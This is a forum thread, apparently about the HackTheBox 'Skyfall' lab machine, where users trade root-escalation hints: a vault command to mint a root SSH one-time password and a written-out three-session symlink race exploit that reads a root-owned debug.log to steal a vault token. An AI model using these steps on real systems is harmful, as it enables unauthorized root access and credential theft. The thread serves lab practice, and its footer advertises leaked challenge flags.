Possibly Related Threads…

sharknpls · 07-01-2024, 05:38 AM

(06-20-2024, 09:41 AM)SpiritWolf Wrote: Anyone? Noone at all?

I think this will help you if root is what you seek:
vault write -address="http://prd23-vault-internal.skyfall.htb" ssh/creds/admin_otp_key_role ip="10.10.11.254" username="root"

quarantineph2020 · 07-01-2024, 02:03 PM

(07-01-2024, 05:38 AM)sharknpls Wrote:
(06-20-2024, 09:41 AM)SpiritWolf Wrote: Anyone? Noone at all?

I think this will help you if root is what you seek:
vault write -address="http://prd23-vault-internal.skyfall.htb" ssh/creds/admin_otp_key_role ip="10.10.11.254" username="root"

he won't be able to SSH as root unless he has the proper vault token, which is in the debug.log file (owned by root).

Need to exploit the symlink race condition while logged in as askyy in order to get the token.

xiliobingo · 07-23-2024, 08:32 PM

(07-01-2024, 02:03 PM)quarantineph2020 Wrote:
(07-01-2024, 05:38 AM)sharknpls Wrote:
(06-20-2024, 09:41 AM)SpiritWolf Wrote: Anyone? Noone at all?

I think this will help you if root is what you seek:
vault write -address="http://prd23-vault-internal.skyfall.htb" ssh/creds/admin_otp_key_role ip="10.10.11.254" username="root"

he won't be able to SSH as root unless he has the proper vault token, which is in the debug.log file (owned by root).

Need to exploit the symlink race condition while logged in as askyy in order to get the token.

ho to exploit this symlink race condition
please!

quarantineph2020 · 08-12-2024, 01:27 PM

(07-23-2024, 08:32 PM)xiliobingo Wrote:
(07-01-2024, 02:03 PM)quarantineph2020 Wrote:
(07-01-2024, 05:38 AM)sharknpls Wrote:
(06-20-2024, 09:41 AM)SpiritWolf Wrote: Anyone? Noone at all?

I think this will help you if root is what you seek:
vault write -address="http://prd23-vault-internal.skyfall.htb" ssh/creds/admin_otp_key_role ip="10.10.11.254" username="root"

he won't be able to SSH as root unless he has the proper vault token, which is in the debug.log file (owned by root).

Need to exploit the symlink race condition while logged in as askyy in order to get the token.

ho to exploit this symlink race condition
please!

Relevant article here: https://hackmd.io/@bachtam2001/BkZkudoLq

You need to open 3 SSH sessions, then:

# first SSH session - infinitely loop the symlink process for target logfile

while true; do touch /home/askyy/debug.log; ln -sf /home/askyy/debug.log /dev/shm/symlink.log; rm /dev/shm/symlink.log; done 2>/dev/null

# second SSH session - loop to try to access file contents of symlink

while true; do cat /dev/shm/symlink.log; done 2>/dev/null

# third SSH session (may need to do it a few times) - trigger the creation of the logfile

sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -vd

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	360	88,710	03-28-2026, 09:28 AM Last Post: catsweet
	[FREE] HTB-ProLabs APTLABS Just Flags	kewlsunny	23	2,348	03-28-2026, 03:30 AM Last Post: lulaladrow
	[MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot	htb-bot	87	7,490	03-27-2026, 07:22 PM Last Post: stn
	HTB Eloquia User and Root Flags - Insane Box	69646B	13	350	03-27-2026, 06:14 PM Last Post: vlxw
	HTB - ALL Challenges you Stuck in	osamy7593	2	646	03-27-2026, 04:24 PM Last Post: catsweet